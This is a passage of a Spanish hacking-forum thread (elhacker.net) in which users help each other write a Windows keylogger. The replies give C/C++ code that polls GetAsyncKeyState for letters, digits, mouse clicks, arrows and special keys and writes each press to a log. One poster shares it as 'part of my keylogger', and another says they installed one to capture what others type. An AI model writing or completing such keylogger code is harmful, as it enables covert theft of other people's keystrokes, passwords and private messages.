elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  ayuda con keylog.. porfavor..
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con keylog.. porfavor..  (Leído 6,239 veces)
juas juas juas

Desconectado Desconectado

Mensajes: 136


Ver Perfil
Re: ayuda con keylog.. porfavor..
« Respuesta #10 en: 3 Marzo 2008, 20:15 pm »

Bueno creo que ya te entiendo (que ya era hora, eh) y mas o menos lo que tu quieres es algo como esto

Código
  1. #include <stdio.h>
  2. #include <windows.h>
  3.  
  4. int main()
  5. {
  6.    int lain,i=0;
  7.  
  8.    do
  9.    {
  10.        while(GetAsyncKeyState(VK_SHIFT))
  11.        {
  12.            lain=GetAsyncKeyState(65);
  13.            if(lain!=0)
  14.                printf("Estas pulsando Shift-a\n");
  15.        }
  16.    }while(1);
  17.    return 0;
  18. }
  19.  

Por cierto, si lo que estas haciendo es un keylogger igual deberias de pensar en otra cosa y no en un while ejecutandose hasta el fin de los tiempos ya que te cargara mogollon la cpu. Busca algo de informacion sobre "semaforos en c", yo que en linux es posible pero en windows no lo se. Con esto el programa se mantendra a la espera y no cargaras tanto la cpu.


En línea

saiya

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: ayuda con keylog.. porfavor..
« Respuesta #11 en: 15 Junio 2013, 16:20 pm »

hola necesito irgente que me digan por q instale keylogger pero  cuando escriben no diferencia entre mayusculas y minusculas , nos epeude o como lo hago para que las detecte


En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: ayuda con keylog.. porfavor..
« Respuesta #12 en: 15 Junio 2013, 16:56 pm »

talves esta parte de mi keylogger te ayude

Código
  1. for(int x=65;x<=90;x++) //valores ascii de los caracteres
  2. {
  3. if ( GetAsyncKeyState ( x ) == -32767 )
  4. {
  5. log << ( char ) x;
  6. }
  7. }
  8. for ( int x=48; x<=57; x++ ) //valores ascii de los numeros
  9. {
  10. if ( GetAsyncKeyState (x) == -32767 )
  11. {
  12. log << ( char ) x;
  13. }
  14. }
  15. if ( GetAsyncKeyState ( ' ' ) == -32767)
  16. {
  17. log << " ";
  18. }
  19. if ( GetAsyncKeyState (1) == -32767)
  20. { //CLICK izquierdo
  21. log << "[click-izq]";
  22. }
  23. if ( GetAsyncKeyState(2) == -32767 )
  24. { //click derecho
  25. log << "[click-der]";
  26. }
  27. if ( GetAsyncKeyState (8) == -32767 )
  28. { // nada que decir
  29. log << "[backspace]";
  30. }
  31. if ( GetAsyncKeyState (190) == -32767 )
  32. { // nada que decir
  33. log << ".";
  34. }
  35. if ( GetAsyncKeyState (188) == -32767 )
  36. { // nada que decir
  37. log << ",";
  38. }
  39. if ( GetAsyncKeyState (13) == -32767 )
  40. { // nada que decir
  41. log << "[enter]";
  42. }
  43. //capturar flechas
  44. if(GetAsyncKeyState(37) == -32767)
  45. { // nada que decir
  46. log << "[left]";
  47. }
  48. if(GetAsyncKeyState(38) == -32767 )
  49. { // nada que decir
  50. log << "[up]";
  51. }
  52. if(GetAsyncKeyState(39) == -32767 )
  53. { // nada que decir
  54. log << "[right]";
  55. }
  56. if(GetAsyncKeyState(40) == -32767)
  57. { // nada que decir
  58. log << "[down]";
  59. }
  60.  
  61. if(GetAsyncKeyState(9) == -32767)
  62. {
  63. log << "[tab]";
  64. }
En línea

buenas
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con keylog
Análisis y Diseño de Malware
147852 2 3,000 Último mensaje 17 Julio 2014, 09:02 am
por scott_
Ayuda con Keylog
Análisis y Diseño de Malware
geluze 5 3,029 Último mensaje 4 Septiembre 2014, 11:13 am
por JACX1994
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines